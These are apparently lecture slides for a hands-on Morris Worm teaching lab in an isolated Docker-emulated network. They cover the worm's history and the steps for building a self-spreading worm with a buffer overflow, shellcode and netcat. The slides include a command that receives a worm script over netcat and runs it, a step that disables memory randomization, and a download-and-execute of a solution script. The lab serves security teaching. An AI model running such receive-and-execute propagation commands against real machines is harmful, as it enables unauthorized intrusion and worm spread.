Morris Worm Attack

Developed based on
[Link]
Overview
• What is Morris Worm?
• How to demonstrate the attack?
• Morris Worm lab
• Setup VM
[Link]
[Link]
What is Morris Worm?
• A malware was developed by Robert Tappan MORRIS,
• was a first-year graduate student in Cornell University's computer science Ph.D.
program
• did undergraduate work at Harvard
• a tenured professor at MIT in 2006
• had a Unix account the Cornell
• Morris’ goal
• a program can self-spread across a national network of computers after being
inserted at one computer location connected to the network
• not destructive
• demonstrate the inadequacies of current security measures on computer networks
by exploiting the security defects that he had discovered
[Link]
Attacking Method
• through a "hole" or "bug" (an error) in sendmail
• a computer program that transfers and receives electronic mail on a computer
• use finger deamon to find users’ information
• through a bug in the "finger deamon" program (the lab focuses on)
• a program that permits a person to query limited information about the users of another computer
• read a user’s query (input) using an old version of gets() —into a 512-byte buffer on the stack (buffer
overflow, think about strcpy()).
• through the "trusted hosts" feature
• which permits a user with certain privileges on one computer to have equivalent privileges on another
computer without using a password (setuid); and
• through a program of password guessing,
• whereby various combinations of letters are tried out in rapid sequence in the hope that one will be an
authorized user's password, which is entered to permit whatever level of activity that user is authorized
to perform.
Why study Morris Worm?
• Morris Worm vs. Ransomware
• The techniques are still the same
• exploit vulnerabilities
• self-duplication
• self-spreading
• non-destructive vs. asking ransom fee (WannaCry)
• A virtual lab design by Wenliang Du at Syracuse
university in 2021
Hands-on Lab
Morris attack environment setup
• Install seed VM
• Running on an Internet emulator
• A simplified version of the attack code written in Python

online manual:
[Link]
[Link]
Hands-on Lab (1): Install
seed VM
Download Ubuntu Image
Extract zip file
Open Oracle VM VirtualBox Manager
1: Select Use an existing virtual
hard disk file.

2: Select folder icon to browse

files.

3: Point to [Link]

4: Click Finish

2
1
Click start to launch
Hands-on Lab (2): Build a
nano Internet
 group 1

The Internet Emulator

group 3 group 2
• The pre-built emulator
• The lab uses multiple containers to mimic
multiple PCs in a network
• Multiple PCs are in three groups (subnet) group 3
• each group has 5 PCs, one router
• Groups are inter-connected
• The configuration of the containers is defined
in [Link]
• Start the emulator
 Container
Dockerfile
httpd
Docker Compose
(YAML File)
Container
Dockerfile
mysql
Application
Obtain lab files
Folders we need

Mimic internet

visualize attacked machines

Attacker writes the worm

Define a nano internet using docker

A configuration file
allows you to easily
start, stop, and
manage multiple
containers for your
application's

1: consists of
2: All nodes are inherited from

3: from
 1: consists of

2: inherited from

Hostname Dockerfile: build

configuration

PC/node real IP
address

router real IP address

another router with real IP

address connect three
subnets (groups)
Define a host/node of nano internet using Dockerfile

2: from
from morris-worm-base
The host/node of nano internet is inherited from another Dockerfile (morris-worm-base)

3: from
Start nano internet
Build images with docker-compose up command
alias
alias are defined here

Start the nono internet by firing up containers using the command docker-compose up

alias
In a new shell windows (new tab), verify the nano internet is running

three subnets
are marked in
different colors
Visualize nano internet
 [Link]

IP range 10.X.0.Y
• X = [151-153]
• Y = [71 - 75]
How to manually sent
a package in a host
and observe the
results
The mapwhy?
flashes any host
pings [Link]. once a host is
infected, we let the host
runs "ping [Link]“.
Hands-on Lab (3): Create
the worm
Characters of the lab’s [Link]
• Focus on exploiting buffer overflow vulnerability
• (injection) use [Link] to crafted badfile containing shellcode and
commands
• (control) Use shellcode to gain the control of victim’s machines
• (infection/spreading) use netcat commands to receive [Link] at victim’s
machines in Bash Shell sent by attacking machines
• Ensure only one copy of [Link] is running
• test the existence of badfile to identify whether a victim has been infected
• if true, it assumes other [Link] is running and kills itself
 attacking machine Victim
writes

1 [Link] creates badfile

(injection) 2 send badfile to
another machine via
buffer overflow attack
3 nc in badfile is executed (control)
wait for [Link] and execute it

5 gets [Link] running forever

4 sends [Link] (spread)
The attacker writes the [Link]
10.X.0.Y
• X = [151-153]
• Y = [71 - 75]

5. send [Link] to an infected host

Solution

the infected machine will

1. listens port 9999
2. receives [Link]
3. execute the [Link]

" nc -lnv 9999 > [Link] && python3 [Link] "

Turn memory randomization off

use different terminals

Observe $ebp and &buffer. Both messages should keep the same addresses
Before

After
Before

After
Before

After Must be 9090

nc -lnv 9999
Must be the same as the
command in shellcode
 launch attack

Observe nano
internet
Clean up

Shunt down the nano internet and visualization server. In ../nano and ../map folders
$ dcdown

You can download [Link]. Make sure you change it to executable

$ wget [Link]
$ chmod +x [Link]
$ ./[Link]
Debugging
• Did you turn memory randomization off
• sudo /sbin/sysctl -w kernel.randomize_va_space=0

• Your $ebp and &buffer may differ from the demo

• Is the shellcode format correct?
• Did you change the [Link] permission if you download the
solution directly from Dropbox?
• Is your nano internet running?
• Is your map server on?
• Are you monitoring the nano internet?
• icmp and dst [Link]
Observations in nodes
(optional)
badfile doesn’t change
[Link] keeps changing